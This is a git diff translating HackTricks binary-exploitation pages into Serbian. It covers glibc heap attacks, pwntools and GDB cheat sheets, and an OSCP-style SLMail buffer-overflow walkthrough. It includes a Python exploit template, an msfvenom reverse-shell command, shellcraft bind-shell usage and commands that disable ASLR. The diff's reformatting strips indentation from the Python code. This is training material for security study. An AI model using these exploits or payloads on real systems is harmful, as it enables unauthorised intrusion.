+Oslobođeni delovi se unose u bin u zavisnosti od njihove veličine. Ali pre nego što se unesu, čuvaju se u unsorted bins. Kada se deo oslobodi, ne unosi se odmah u svoj bin, već ostaje u unsorted bins. Zatim, ako se rezerviše novi deo i prethodni oslobođeni može poslužiti, vraća se, ali ako se rezerviše veći, oslobođeni deo u unsorted bins se stavlja u svoj odgovarajući bin.
 
-Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max_fast (72normalmente) y menos a MIN_LARGE_SIZE (512).
+Da bi se došlo do ranjivog koda, zahtev za memorijom mora biti veći od av->max_fast (72 obično) i manji od MIN_LARGE_SIZE (512).
 
-Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo:
+Ako u binu postoji deo odgovarajuće veličine za ono što se traži, vraća se taj nakon što se odveže:
 
-bck = victim->bk; Apunta al trozo anterior, es la única info que podemos alterar.
+bck = victim->bk; Pokazuje na prethodni deo, to je jedina informacija koju možemo izmeniti.
 
-bin->bk = bck; El penúltimo trozo pasa a ser el último, en caso de que bck apunte al stack al siguiente trozo reservado se le dará esta dirección
+bin->bk = bck; Pretposlednji deo postaje poslednji, u slučaju da bck pokazuje na stek, sledećem rezervisanom delu će se dati ova adresa
 
-bck->fd = bin; Se cierra la lista haciendo que este apunte a bin
+bck->fd = bin; Lista se zatvara tako da ovaj pokazuje na bin
 
-Se necesita:
+Potrebno je:
 
-Que se reserven dos malloc, de forma que al primero se le pueda hacer overflow después de que el segundo haya sido liberado e introducido en su bin (es decir, se haya reservado un malloc superior al segundo trozo antes de hacer el overflow)
+Da se rezervišu dva malloc, tako da se prvom može napraviti overflow nakon što je drugi oslobođen i unet u svoj bin (tj. da se rezerviše malloc veći od drugog dela pre nego što se napravi overflow)
 
-Que el malloc reservado al que se le da la dirección elegida por el atacante sea controlada por el atacante.
+Da rezervisani malloc kojem se daje adresa izabrana od strane napadača bude pod kontrolom napadača.
 
-El objetivo es el siguiente, si podemos hacer un overflow a un heap que tiene por debajo un trozo ya liberado y en su bin, podemos alterar su puntero bk. Si alteramos su puntero bk y este trozo llega a ser el primero de la lista de bin y se reserva, a bin se le engañará y se le dirá que el último trozo de la lista (el siguiente en ofrecer) está en la dirección falsa que hayamos puesto (al stack o GOT por ejemplo). Por lo que si se vuelve a reservar otro trozo y el atacante tiene permisos en él, se le dará un trozo en la posición deseada y podrá escribir en ella.
+Cilj je sledeći, ako možemo napraviti overflow na heap koji ispod ima već oslobođeni deo i u svom binu, možemo izmeniti njegov pokazivač bk. Ako izmenimo njegov pokazivač bk i ovaj deo postane prvi u listi bina i rezervi se, bin će biti prevaren i reći će mu da je poslednji deo liste (sledeći koji se nudi) na lažnoj adresi koju smo stavili (na stek ili GOT, na primer). Tako da ako se ponovo rezerviše drugi deo i napadač ima dozvole za njega, dobiće deo na željenoj poziciji i moći će da piše u nju.
 
-Tras liberar el trozo modificado es necesario que se reserve un trozo mayor al liberado, así el trozo modificado saldrá de unsorted bins y se introduciría en su bin.
+Nakon oslobađanja izmenjenog dela, potrebno je rezervisati deo veći od oslobođenog, tako da će izmenjeni deo izaći iz unsorted bins i uneti se u svoj bin.
 
-Una vez en su bin es el momento de modificarle el puntero bk mediante el overflow para que apunte a la dirección que queramos sobreescribir.
+Jednom kada je u svom binu, vreme je da mu izmenimo pokazivač bk putem overflow-a da bi pokazivao na adresu koju želimo da prepišemo.
 
-Así el bin deberá esperar turno a que se llame a malloc() suficientes veces como para que se vuelva a utilizar el bin modificado y engañe a bin haciéndole creer que el siguiente trozo está en la dirección falsa. Y a continuación se dará el trozo que nos interesa.
+Tako će bin čekati red da se pozove malloc() dovoljno puta da bi se ponovo koristio izmenjeni bin i prevario bin da pomisli da je sledeći deo na lažnoj adresi. A zatim će se dati deo koji nas zanima.
 
-Para que se ejecute la vulnerabilidad lo antes posible lo ideal sería: Reserva del trozo vulnerable, reserva del trozo que se modificará, se libera este trozo, se reserva un trozo más grande al que se modificará, se modifica el trozo (vulnerabilidad), se reserva un trozo de igual tamaño al vulnerado y se reserva un segundo trozo de igual tamaño y este será el que apunte a la dirección elegida.
+Da bi se ranjivost izvršila što je pre moguće, idealno bi bilo: Rezervacija ranjivog dela, rezervacija dela koji će se izmeniti, oslobađanje ovog dela, rezervacija dela veće veličine koji će se izmeniti, izmena dela (ranjivost), rezervacija dela iste veličine kao ranjivog i rezervacija drugog dela iste veličine i ovaj će biti onaj koji pokazuje na izabranu adresu.
 
-Para proteger este ataque se uso la típica comprobación de que el trozo “no” es falso: se comprueba si bck->fd está apuntando a victim. Es decir, en nuestro caso si el puntero fd\* del trozo falso apuntado en el stack está apuntando a victim. Para sobrepasar esta protección el atacante debería ser capaz de escribir de alguna forma (por el stack probablemente) en la dirección adecuada la dirección de victim. Para que así parezca un trozo verdadero.
+Da bi se zaštitio od ovog napada, korišćena je tipična provera da deo “nije” lažan: proverava se da li bck->fd pokazuje na victim. Drugim rečima, u našem slučaju, ako pokazivač fd\* lažnog dela koji se pokazuje na steku pokazuje na victim. Da bi se prešla ova zaštita, napadač bi trebao biti u mogućnosti da na neki način (verovatno putem steka) napiše na odgovarajuću adresu adresu victim. Tako da izgleda kao pravi deo.
 
-**Corrupción LargeBin**
+**Korupcija LargeBin**
 
-Se necesitan los mismos requisitos que antes y alguno más, además los trozos reservados deben ser mayores a 512.
+Potrebni su isti zahtevi kao ranije i još neki, pored toga, rezervisani delovi moraju biti veći od 512.
 
-El ataque es como el anterior, es decir, ha que modificar el puntero bk y se necesitan todas esas llamadas a malloc(), pero además hay que modificar el size del trozo modificado de forma que ese size - nb sea < MINSIZE.
+Napad je kao i prethodni, tj. mora se izmeniti pokazivač bk i potrebni su svi ti pozivi na malloc(), ali pored toga, treba izmeniti size izmenjenog dela tako da taj size - nb bude < MINSIZE.
 
-Por ejemplo hará que poner en size 1552 para que 1552 - 1544 = 8 < MINSIZE (la resta no puede quedar negativa porque se compara un unsigned)
+Na primer, to će učiniti da se stavi u size 1552 kako bi 1552 - 1544 = 8 < MINSIZE (oduzimanje ne može biti negativno jer se upoređuje unsigned)
 
-Además se ha introducido un parche para hacerlo aún más complicado.
+Pored toga, uveden je patch da bi se to učinilo još komplikovanijim.
 
 **Heap Spraying**
 
-Básicamente consiste en reservar tooda la memoria posible para heaps y rellenar estos con un colchón de nops acabados por una shellcode. Además, como colchón se utiliza 0x0c. Pues se intentará saltar a la dirección 0x0c0c0c0c, y así si se sobreescribe alguna dirección a la que se vaya a llamar con este colchón se saltará allí. Básicamente la táctica es reservar lo máximos posible para ver si se sobreescribe algún puntero y saltar a 0x0c0c0c0c esperando que allí haya nops.
+Osnovno se sastoji od rezervisanja što više moguće memorije za heaps i punjenja ovih sa jastučićem nops završenim shellcode-om. Pored toga, kao jastučić se koristi 0x0c. Tako da će se pokušati preskočiti na adresu 0x0c0c0c0c, i tako ako se prepiše neka adresa na koju će se pozvati sa ovim jastučićem, preskočiće se tamo. Osnovna taktika je rezervisati što je više moguće da vidimo da li se prepisuje neki pokazivač i preskočiti na 0x0c0c0c0c očekujući da tamo budu nops.
 
 **Heap Feng Shui**
 
-Consiste en mediante reservas y liberaciones sementar la memoria de forma que queden trozos reservados entre medias de trozos libres. El buffer a desbordar se situará en uno de los huevos.
+Sastoji se od rezervacija i oslobađanja kako bi se semenirala memorija tako da ostanu rezervisani delovi između slobodnih delova. Buffer koji se preplavljuje će se nalaziti u jednom od jaja.
 
-**objdump -d ejecutable** —> Disas functions\
-**objdump -d ./PROGRAMA | grep FUNCION** —> Get function address\
-**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes\
-**objdump -t ./exec | grep varBss** —> Tabla de símbolos, para sacar address de variables y funciones\
-**objdump -TR ./exec | grep exit(func lib)** —> Para sacar address de funciones de librerías (GOT)\
+**objdump -d izvršni** —> Disas funkcije\
+**objdump -d ./PROGRAMA | grep FUNKCIJA** —> Dobijanje adrese funkcije\
+**objdump -d -Mintel ./shellcodeout** —> Da se vidi da je to zapravo naš shellcode i izvuče OpCodes\
+**objdump -t ./exec | grep varBss** —> Tabela simbola, da se izvuče adresa varijabli i funkcija\
+**objdump -TR ./exec | grep exit(func lib)** —> Da se izvuče adresa funkcija iz biblioteka (GOT)\
 **objdump -d ./exec | grep funcCode**\
 **objdump -s -j .dtors /exec**\
 **objdump -s -j .got ./exec**\
-**objdump -t --dynamic-relo ./exec | grep puts** —> Saca la dirección de puts a sobreescribir en le GOT\
-**objdump -D ./exec** —> Disas ALL hasta las entradas de la plt\
+**objdump -t --dynamic-relo ./exec | grep puts** —> Izvlači adresu puts koju treba prepisati u GOT\
+**objdump -D ./exec** —> Disas SVE do ulaza u plt\
 **objdump -p -/exec**\
-**Info functions strncmp —>** Info de la función en gdb
+**Info functions strncmp —>** Info o funkciji u gdb
 
-## Interesting courses
+## Zanimljivi kursevi
 
 - [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io)
 - [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
 - [https://ir0nstone.gitbook.io/notes](https://ir0nstone.gitbook.io/notes)
 
-## **References**
+## **Reference**
 
 - [**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html)
 
diff --git a/src/exploiting/linux-exploiting-basic-esp/fusion.md b/src/exploiting/linux-exploiting-basic-esp/fusion.md
index 344a72d02..ddd6ae485 100644
--- a/src/exploiting/linux-exploiting-basic-esp/fusion.md
+++ b/src/exploiting/linux-exploiting-basic-esp/fusion.md
@@ -4,9 +4,8 @@
 
 [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
 
-1. Get offset to modify EIP
-2. Put shellcode address in EIP
-
+1. Dobijte offset za modifikaciju EIP
+2. Stavite adresu shellcode-a u EIP
 ```python
 from pwn import *
 
@@ -32,9 +31,7 @@ r.recvline()
 r.send(buf)
 r.interactive()
 ```
-
 # Level01
-
 ```python
 from pwn import *
 
@@ -60,5 +57,4 @@ buf += "\x65\xd9\x0f\x01"
 r.send(buf)
 r.interactive()
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/exploiting/tools/README.md b/src/exploiting/tools/README.md
index 0ca40e712..771a164ce 100644
--- a/src/exploiting/tools/README.md
+++ b/src/exploiting/tools/README.md
@@ -1,9 +1,8 @@
-# Exploiting Tools
+# Alati za Eksploataciju
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## Metasploit
-
 ```
 pattern_create.rb -l 3000   #Length
 pattern_offset.rb -l 3000 -q 5f97d534   #Search offset
@@ -11,31 +10,23 @@ nasm_shell.rb
 nasm> jmp esp   #Get opcodes
 msfelfscan -j esi /opt/fusion/bin/level01
 ```
-
 ### Shellcodes
-
 ```
 msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
 ```
-
 ## GDB
 
-### Install
-
+### Instaliraj
 ```
 apt-get install gdb
 ```
-
-### Parameters
-
+### Parametri
 ```bash
 -q # No show banner
 -x  # Auto-execute GDB instructions from here
 -p  # Attach to process
 ```
-
-### Instructions
-
+### Uputstva
 ```bash
 run # Execute
 start # Start and break in main
@@ -81,9 +72,7 @@ x/s pointer # String pointed by the pointer
 x/xw &pointer # Address where the pointer is located
 x/i $eip # Instructions of the EIP
 ```
-
 ### [GEF](https://github.com/hugsy/gef)
-
 ```bash
 help memory # Get help on memory command
 canary # Search for canary value in memory
@@ -113,34 +102,32 @@ shellcode get 61 #Download shellcode number 61
 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
 2- ef➤  i f
 Stack level 0, frame at 0x7fffffffddd0:
- rip = 0x400cd3; saved rip = 0x6261617762616176
- called by frame at 0x7fffffffddd8
- Arglist at 0x7fffffffdcf8, args:
- Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
- Saved registers:
-  rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
+rip = 0x400cd3; saved rip = 0x6261617762616176
+called by frame at 0x7fffffffddd8
+Arglist at 0x7fffffffdcf8, args:
+Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
+Saved registers:
+rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
 gef➤  pattern search 0x6261617762616176
 [+] Searching for '0x6261617762616176'
 [+] Found at offset 184 (little-endian search) likely
 ```
+### Trikovi
 
-### Tricks
+#### GDB iste adrese
 
-#### GDB same addresses
-
-While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
+Dok debagujete, GDB će imati **malo drugačije adrese od onih koje koristi binarni fajl kada se izvršava.** Možete učiniti da GDB ima iste adrese tako što ćete:
 
 - `unset env LINES`
 - `unset env COLUMNS`
-- `set env _=` _Put the absolute path to the binary_
-- Exploit the binary using the same absolute route
-- `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
+- `set env _=` _Unesite apsolutnu putanju do binarnog fajla_
+- Iskoristite binarni fajl koristeći istu apsolutnu putanju
+- `PWD` i `OLDPWD` moraju biti isti kada koristite GDB i kada eksploatišete binarni fajl
 
-#### Backtrace to find functions called
-
-When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\
-You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
+#### Backtrace za pronalaženje pozvanih funkcija
 
+Kada imate **staticki povezani binarni fajl**, sve funkcije će pripadati binarnom fajlu (a ne spoljnim bibliotekama). U ovom slučaju će biti teško **identifikovati tok koji binarni fajl prati da bi, na primer, zatražio unos od korisnika.**\
+Možete lako identifikovati ovaj tok tako što ćete **pokrenuti** binarni fajl sa **gdb** dok ne zatraži unos. Zatim, zaustavite ga sa **CTRL+C** i koristite **`bt`** (**backtrace**) komandu da vidite pozvane funkcije:
 ```
 gef➤  bt
 #0  0x00000000004498ae in ?? ()
@@ -149,79 +136,74 @@ gef➤  bt
 #3  0x00000000004011a9 in ?? ()
 #4  0x0000000000400a5a in ?? ()
 ```
-
 ### GDB server
 
-`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)
+`gdbserver --multi 0.0.0.0:23947` (u IDA morate uneti apsolutnu putanju izvršne datoteke na Linux mašini i na Windows mašini)
 
 ## Ghidra
 
-### Find stack offset
+### Pronađi offset steka
 
-**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\
-For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
-_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
+**Ghidra** je veoma korisna za pronalaženje **offset-a** za **buffer overflow zahvaljujući informacijama o poziciji lokalnih varijabli.**\
+Na primer, u primeru ispod, buffer flow u `local_bc` ukazuje da vam je potreban offset od `0xbc`. Štaviše, ako je `local_10` kanarska kolačić, to ukazuje da da biste ga prepisali iz `local_bc` postoji offset od `0xac`.\
+_Pamti da prvih 0x08 odakle se čuva RIP pripada RBP-u._
 
 ![](<../../images/image (616).png>)
 
 ## GCC
 
-**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
-**-o** --> Output\
-**-g** --> Save code (GDB will be able to see it)\
-**echo 0 > /proc/sys/kernel/randomize_va_space** --> To deactivate the ASLR in linux
+**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompajliraj bez zaštita\
+**-o** --> Izlaz\
+**-g** --> Sačuvaj kod (GDB će moći da ga vidi)\
+**echo 0 > /proc/sys/kernel/randomize_va_space** --> Da deaktivira ASLR u linuxu
 
-**To compile a shellcode:**\
-**nasm -f elf assembly.asm** --> return a ".o"\
-**ld assembly.o -o shellcodeout** --> Executable
+**Da kompajlirate shellcode:**\
+**nasm -f elf assembly.asm** --> vraća ".o"\
+**ld assembly.o -o shellcodeout** --> Izvršna datoteka
 
 ## Objdump
 
-**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
-**-Mintel** --> **Intel** syntax\
-**-t** --> **Symbols** table\
-**-D** --> **Disassemble all** (address of static variable)\
-**-s -j .dtors** --> dtors section\
-**-s -j .got** --> got section\
-\-D -s -j .plt --> **plt** section **decompiled**\
-**-TR** --> **Relocations**\
-**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\
-**objdump -D ./exec | grep "VAR_NAME"** --> Address or a static variable (those are stored in DATA section).
+**-d** --> **Disasembliraj izvršne** sekcije (vidi opkode kompajliranog shellcode-a, pronađi ROP Gadgets, pronađi adresu funkcije...)\
+**-Mintel** --> **Intel** sintaksa\
+**-t** --> **Tabela** simbola\
+**-D** --> **Disasembliraj sve** (adresa statične varijable)\
+**-s -j .dtors** --> dtors sekcija\
+**-s -j .got** --> got sekcija\
+\-D -s -j .plt --> **plt** sekcija **dekompilirana**\
+**-TR** --> **Relokacije**\
+**ojdump -t --dynamic-relo ./exec | grep puts** --> Adresa "puts" za modifikaciju u GOT\
+**objdump -D ./exec | grep "VAR_NAME"** --> Adresa ili statična varijabla (one se čuvaju u DATA sekciji).
 
 ## Core dumps
 
-1. Run `ulimit -c unlimited` before starting my program
-2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
+1. Pokrenite `ulimit -c unlimited` pre nego što pokrenete moj program
+2. Pokrenite `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
 3. sudo gdb --core=\ --quiet
 
-## More
+## Više
 
-**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\
-**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Loop to see if the address changes a lot\
-**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\
-**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh"
+**ldd izvršna datoteka | grep libc.so.6** --> Adresa (ako je ASLR, onda se ovo menja svaki put)\
+**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Petlja da vidi da li se adresa mnogo menja\
+**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset "system"\
+**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset "/bin/sh"
 
-**strace executable** --> Functions called by the executable\
-**rabin2 -i ejecutable -->** Address of all the functions
+**strace izvršna datoteka** --> Funkcije koje poziva izvršna datoteka\
+**rabin2 -i ejecutable -->** Adresa svih funkcija
 
 ## **Inmunity debugger**
-
 ```bash
 !mona modules    #Get protections, look for all false except last one (Dll of SO)
 !mona find -s "\xff\xe4" -m name_unsecure.dll   #Search for opcodes insie dll space (JMP ESP)
 ```
-
 ## IDA
 
-### Debugging in remote linux
-
-Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux_server_ or _linux_server64_ inside the linux server and run it nside the folder that contains the binary:
+### Debugging u udaljenom linuxu
 
+Unutar IDA fascikle možete pronaći binarne datoteke koje se mogu koristiti za debagovanje binarne datoteke unutar linuxa. Da biste to uradili, premestite binarnu datoteku _linux_server_ ili _linux_server64_ unutar linux servera i pokrenite je unutar fascikle koja sadrži binarnu datoteku:
 ```
 ./linux_server64 -Ppass
 ```
-
-Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
+Zatim, konfigurišite debager: Debugger (linux remote) --> Opcije procesa...:
 
 ![](<../../images/image (101).png>)
 
diff --git a/src/exploiting/tools/pwntools.md b/src/exploiting/tools/pwntools.md
index a7c0aa204..29e8800e1 100644
--- a/src/exploiting/tools/pwntools.md
+++ b/src/exploiting/tools/pwntools.md
@@ -1,118 +1,98 @@
 {{#include ../../banners/hacktricks-training.md}}
-
 ```
 pip3 install pwntools
 ```
-
 # Pwn asm
 
-Get opcodes from line or file.
-
+Dobijte opkode iz linije ili fajla.
 ```
 pwn asm "jmp esp"
 pwn asm -i 
 ```
+**Može se odabrati:**
 
-**Can select:**
-
-- output type (raw,hex,string,elf)
-- output file context (16,32,64,linux,windows...)
-- avoid bytes (new lines, null, a list)
-- select encoder debug shellcode using gdb run the output
+- tip izlaza (raw, hex, string, elf)
+- kontekst izlaza (16, 32, 64, linux, windows...)
+- izbegavanje bajtova (nove linije, null, lista)
+- odabrati enkoder za debagovanje shellcode-a koristeći gdb za pokretanje izlaza
 
 # **Pwn checksec**
 
-Checksec script
-
+Checksec skripta
 ```
 pwn checksec 
 ```
-
 # Pwn constgrep
 
 # Pwn cyclic
 
-Get a pattern
-
+Dobijte obrazac
 ```
 pwn cyclic 3000
 pwn cyclic -l faad
 ```
+**Može se odabrati:**
 
-**Can select:**
-
-- The used alphabet (lowercase chars by default)
-- Length of uniq pattern (default 4)
-- context (16,32,64,linux,windows...)
-- Take the offset (-l)
+- Korišćeni alfabet (mala slova po defaultu)
+- Dužina jedinstvenog obrasca (podrazumevano 4)
+- kontekst (16,32,64,linux,windows...)
+- Uzmite pomak (-l)
 
 # Pwn debug
 
-Attach GDB to a process
-
+Priključite GDB na proces
 ```
 pwn debug --exec /bin/bash
 pwn debug --pid 1234
 pwn debug --process bash
 ```
+**Može se odabrati:**
 
-**Can select:**
-
-- By executable, by name or by pid context (16,32,64,linux,windows...)
-- gdbscript to execute
+- Po izvršnom fajlu, po imenu ili po pid kontekstu (16,32,64,linux,windows...)
+- gdbscript za izvršavanje
 - sysrootpath
 
 # Pwn disablenx
 
-Disable nx of a binary
-
+Onemogući nx binarnog fajla
 ```
 pwn disablenx 
 ```
-
 # Pwn disasm
 
-Disas hex opcodes
-
+Disas hex opkode
 ```
 pwn disasm ffe4
 ```
+**Može se izabrati:**
 
-**Can select:**
-
-- context (16,32,64,linux,windows...)
-- base addres
-- color(default)/no color
+- kontekst (16,32,64,linux,windows...)
+- osnovna adresa
+- boja(podrazumevano)/bez boje
 
 # Pwn elfdiff
 
-Print differences between 2 fiels
-
+Ispisuje razlike između 2 fajla
 ```
 pwn elfdiff  
 ```
-
 # Pwn hex
 
-Get hexadecimal representation
-
+Dobijte heksadecimalnu reprezentaciju
 ```bash
 pwn hex hola #Get hex of "hola" ascii
 ```
-
 # Pwn phd
 
-Get hexdump
-
+Dobijte hexdump
 ```
 pwn phd 
 ```
+**Može se odabrati:**
 
-**Can select:**
-
-- Number of bytes to show
-- Number of bytes per line highlight byte
-- Skip bytes at beginning
+- Broj bajtova za prikaz
+- Broj bajtova po liniji istaknutih bajtova
+- Preskoči bajtove na početku
 
 # Pwn pwnstrip
 
@@ -120,8 +100,7 @@ pwn phd 
 
 # Pwn shellcraft
 
-Get shellcodes
-
+Dobijanje shellcode-a
 ```
 pwn shellcraft -l #List shellcodes
 pwn shellcraft -l amd #Shellcode with amd in the name
@@ -129,46 +108,39 @@ pwn shellcraft -f hex amd64.linux.sh #Create in C and run
 pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
 pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
 ```
+**Može se izabrati:**
 
-**Can select:**
+- shellcode i argumenti za shellcode
+- Izlazna datoteka
+- format izlaza
+- debagovanje (priključiti dbg na shellcode)
+- pre (debug trap pre koda)
+- posle
+- izbegavati korišćenje opkoda (podrazumevano: nije null i nova linija)
+- Pokreni shellcode
+- Boja/bez boje
+- lista syscalls
+- lista mogućih shellcode-ova
+- Generiši ELF kao deljenu biblioteku
 
-- shellcode and arguments for the shellcode
-- Out file
-- output format
-- debug (attach dbg to shellcode)
-- before (debug trap before code)
-- after
-- avoid using opcodes (default: not null and new line)
-- Run the shellcode
-- Color/no color
-- list syscalls
-- list possible shellcodes
-- Generate ELF as a shared library
-
-# Pwn template
-
-Get a python template
+# Pwn šablon
 
+Dobijte python šablon
 ```
 pwn template
 ```
-
-**Can select:** host, port, user, pass, path and quiet
+**Može se odabrati:** host, port, user, pass, path i quiet
 
 # Pwn unhex
 
-From hex to string
-
+Iz heksa u string
 ```
 pwn unhex 686f6c61
 ```
+# Pwn ažuriranje
 
-# Pwn update
-
-To update pwntools
-
+Da biste ažurirali pwntools
 ```
 pwn update
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
index 1f8119bb8..3029ab7d3 100644
--- a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
@@ -1,21 +1,18 @@
-# Windows Exploiting (Basic Guide - OSCP lvl)
+# Windows Exploiting (Osnovni vodič - OSCP nivo)
 
 {{#include ../banners/hacktricks-training.md}}
 
-## **Start installing the SLMail service**
+## **Počnite sa instalacijom SLMail servisa**
 
-## Restart SLMail service
-
-Every time you need to **restart the service SLMail** you can do it using the windows console:
+## Ponovo pokrenite SLMail servis
 
+Svaki put kada treba da **ponovo pokrenete servis SLMail** možete to uraditi koristeći Windows konzolu:
 ```
 net start slmail
 ```
-
 ![](<../images/image (23) (1).png>)
 
-## Very basic python exploit template
-
+## Veoma osnovni python exploit šablon
 ```python
 #!/usr/bin/python
 
@@ -27,99 +24,89 @@ port = 110
 
 buffer = 'A' * 2700
 try:
-    print "\nLaunching exploit..."
-    s.connect((ip, port))
-    data = s.recv(1024)
-    s.send('USER username' +'\r\n')
-    data = s.recv(1024)
-    s.send('PASS ' + buffer + '\r\n')
-    print "\nFinished!."
+print "\nLaunching exploit..."
+s.connect((ip, port))
+data = s.recv(1024)
+s.send('USER username' +'\r\n')
+data = s.recv(1024)
+s.send('PASS ' + buffer + '\r\n')
+print "\nFinished!."
 except:
-    print "Could not connect to "+ip+":"+port
+print "Could not connect to "+ip+":"+port
 ```
+## **Promenite font Immunity Debuggera**
 
-## **Change Immunity Debugger Font**
+Idite na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
 
-Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
-
-## **Attach the proces to Immunity Debugger:**
+## **Priključite proces na Immunity Debugger:**
 
 **File --> Attach**
 
 ![](<../images/image (24) (1) (1).png>)
 
-**And press START button**
+**I pritisnite START dugme**
 
-## **Send the exploit and check if EIP is affected:**
+## **Pošaljite exploit i proverite da li je EIP pogođen:**
 
 ![](<../images/image (25) (1) (1).png>)
 
-Every time you break the service you should restart it as is indicated in the beginnig of this page.
+Svaki put kada prekinete servis, trebate ga ponovo pokrenuti kao što je naznačeno na početku ove stranice.
 
-## Create a pattern to modify the EIP
+## Napravite obrazac za modifikaciju EIP-a
 
-The pattern should be as big as the buffer you used to broke the service previously.
+Obrazac bi trebao biti dovoljno velik kao buffer koji ste koristili da prekinete servis ranije.
 
 ![](<../images/image (26) (1) (1).png>)
-
 ```
 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
 ```
+Promenite bafer eksploita i postavite obrazac, a zatim pokrenite eksploataciju.
 
-Change the buffer of the exploit and set the pattern and lauch the exploit.
-
-A new crash should appeard, but with a different EIP address:
+Treba da se pojavi novi pad, ali sa drugačijom EIP adresom:
 
 ![](<../images/image (27) (1) (1).png>)
 
-Check if the address was in your pattern:
+Proverite da li je adresa bila u vašem obrascu:
 
 ![](<../images/image (28) (1) (1).png>)
-
 ```
 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
 ```
+Izgleda da **možemo modifikovati EIP na offsetu 2606** bafera.
 
-Looks like **we can modify the EIP in offset 2606** of the buffer.
-
-Check it modifing the buffer of the exploit:
-
+Proverite to modifikujući bafer eksploita:
 ```
 buffer = 'A'*2606 + 'BBBB' + 'CCCC'
 ```
-
-With this buffer the EIP crashed should point to 42424242 ("BBBB")
+Sa ovim baferom EIP se srušio i treba da pokazuje na 42424242 ("BBBB")
 
 ![](<../images/image (30) (1) (1).png>)
 
 ![](<../images/image (29) (1) (1).png>)
 
-Looks like it is working.
+Izgleda da radi.
 
-## Check for Shellcode space inside the stack
+## Proverite prostor za Shellcode unutar steka
 
-600B should be enough for any powerfull shellcode.
-
-Lets change the bufer:
+600B bi trebalo da bude dovoljno za bilo koji moćan shellcode.
 
+Hajde da promenimo bafer:
 ```
 buffer = 'A'*2606 + 'BBBB' + 'C'*600
 ```
-
-launch the new exploit and check the EBP and the length of the usefull shellcode
+pokrenite novi exploit i proverite EBP i dužinu korisnog shellcode-a
 
 ![](<../images/image (31) (1).png>)
 
 ![](<../images/image (32) (1).png>)
 
-You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
+Možete videti da kada se dođe do ranjivosti, EBP pokazuje na shellcode i da imamo puno prostora da lociramo shellcode ovde.
 
-In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
+U ovom slučaju imamo **od 0x0209A128 do 0x0209A2D6 = 430B.** Dovoljno.
 
-## Check for bad chars
-
-Change again the buffer:
+## Proverite loše karaktere
 
+Ponovo promenite bafer:
 ```
 badchars = (
 "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
@@ -141,30 +128,27 @@ badchars = (
 )
 buffer = 'A'*2606 + 'BBBB' + badchars
 ```
+Badchars počinju od 0x01 jer je 0x00 gotovo uvek loš.
 
-The badchars starts in 0x01 because 0x00 is almost always bad.
